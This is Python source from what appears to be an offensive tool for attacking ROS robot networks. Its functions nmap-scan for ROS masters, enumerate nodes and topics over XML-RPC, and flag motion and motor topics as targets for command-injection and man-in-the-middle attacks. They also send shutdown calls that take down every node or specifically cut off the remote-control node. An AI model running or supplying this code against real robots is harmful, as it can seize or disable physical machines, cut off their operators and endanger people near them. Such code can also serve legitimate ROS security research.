def topicAnalyser(self, host, port, attack): """ sorts and prints topic and message type information """ vulnerable_topics = ['/sound', '/cmd_vel', '/motor_power'] exploitable_topics = [] rpc = api.XMLRPC_API(host, port) topics = rpc.getTopicTypes() if len(topics) > 0 and attack == 'ACI': [exploitable_topics.append(topic) for topic in topics if topic[0] in vulnerable_topics] if len(exploitable_topics) > 0: os.system('clear') cprint("\r[+] Topics on target that are vulnerable for ACI attack:", 'green', attrs=['bold']) counter = 1 for topic in exploitable_topics: print(" [" + str(counter) + "] '{}' with message type '{}'". format(topic[0], topic[1])) counter += 1 return exploitable_topics elif len(topics) > 0 and attack == 'MITM': for topic in topics: if topic[0] == '/cmd_vel': return True
def execShutdown(self, host, port, nodes): """ executing the shutdown XML API """ while True: try: option = int(input("\nSelect node to shutdown: ")) if option in range(len(nodes) + 1): rpc = api.XMLRPC_API(host, port) rpc.shutdown(nodes[(option - 1)][1]) os.system('clear') print( colored( "[+] Successfully send shutdown command to node: {}" .format(nodes[(option - 1)][0]), 'green', attrs=['bold'])) break else: sys.stdout.write(colored("\r[!] Invalid input", 'red')) time.sleep(1.5) except ValueError: sys.stdout.write(colored("\r[!] Invalid input", 'red')) time.sleep(1.5)
def systemRecon(self): """ sorts and prints getSystemState() information """ active_nodes = [] for host, port in self.master_hosts: rpc = api.XMLRPC_API(host, port) publisher, subscriber, service = rpc.getSystemState() [active_nodes.append(publisher[n][1][0]) for n in range(len(publisher)) if publisher[n][1][0] not in active_nodes] [active_nodes.append(subscriber[n][1][0]) for n in range(len(subscriber)) if subscriber[n][1][0] not in active_nodes] cprint("[+] Enumeration of ROS environment " + host + " successfully completed:\n", 'green', attrs=['bold']) teller = 1 for node in active_nodes: print(colored(" [" + str(teller) + "] Node: " + node, 'cyan', attrs=['bold'])) print(colored(" Publishing to:", 'white', attrs=['bold'])) for pub in publisher: if node in pub[1]: print(" " + pub[0]) print(colored("\n Subscribed to:", 'white', attrs=['bold'])) for sub in subscriber: if node in sub[1]: print(" " + sub[0]) print(colored("\n Services:", 'white', attrs=['bold'])) for srv in service: if node in srv[1]: print(" " + srv[0]) print() teller += 1
def execDoS(self, host, port): """ shutting down nodes """ rpc = api.XMLRPC_API(host, port) nodes = rpc.filterNodes() if len(nodes) > 0: for node in nodes: rpc.shutdown(node[1])
def isolateRC(self, host, port, rc_node): """ executes targeted DoS attack to isolate the remote control host """ rpc = api.XMLRPC_API(host, port) nodes = rpc.filterNodes() if len(nodes) > 0: for node in nodes: if rc_node[0] == node[0]: rpc.shutdown(node[1])
def defaultMasterFinder(self): """ determine default ROS Master """ active_hosts = network.NetworkScanner(self.ipscan.ipConstructor(), 11311).nmapScan() active_hosts = [ h for h in active_hosts if h != self.ipscan.ipGateway() ] if len(active_hosts) > 0: for host in active_hosts: rpc = api.XMLRPC_API(host, 11311) if rpc.masterCheck() == True: self.found_master_hosts.append([host, 11311])
def nodesAnalyser(self, host, port): """ sorts and prints node, URI and PID information """ rpc = api.XMLRPC_API(host, port) nodes = rpc.filterNodes() if len(nodes) > 0: os.system('clear') cprint("\r[+] Running node(s) on target:", 'green', attrs=['bold']) counter = 1 for node in nodes: print(" [" + str(counter) + "] Node: {} \n URI: {} \n PID: {}". format(node[0], node[1], node[2])) counter += 1 return nodes
def topicRecon(self): """ sorts and prints getTopicTypes() information """ vulnerable_topics = ['/sound', '/cmd_vel', '/motor_power'] for host, port in self.master_hosts: rpc = api.XMLRPC_API(host, port) topics = rpc.getTopicTypes() if len(topics) > 0: cprint("\n[+] Identified topics and message types on target: {}".format(host), 'green', attrs=['bold']) counter = 1 for topic in topics: if topic[0] in vulnerable_topics: cprint(" [" + str(counter) + "] [VULNERABLE] '{}' with message type '{}'". format(topic[0], topic[1]), 'red') counter += 1 else: print(" [" + str(counter) + "] '{}' with message type '{}'".format(topic[0], topic[1])) counter += 1 else: cprint("\n[-] No active topics are found on the target system: {}".format(host), 'red', attrs=['bold'])
def definedMasterFinder(self): """ determine custom defined ROS Master """ for port in range((self.port_range_start + self.port_range_counter), self.port_range_end): self.port_range_counter += 1 if port == 11311: continue self.temp_masters_bin = [] active_hosts = network.NetworkScanner(self.ipscan.ipConstructor(), port).nmapScan() active_hosts = [ h for h in active_hosts if h != self.ipscan.ipGateway() ] if len(active_hosts) > 0: for host in active_hosts: rpc = api.XMLRPC_API(host, port) if rpc.masterCheck() == True: self.found_master_hosts.append([host, port]) self.temp_masters_bin.append([host, port]) return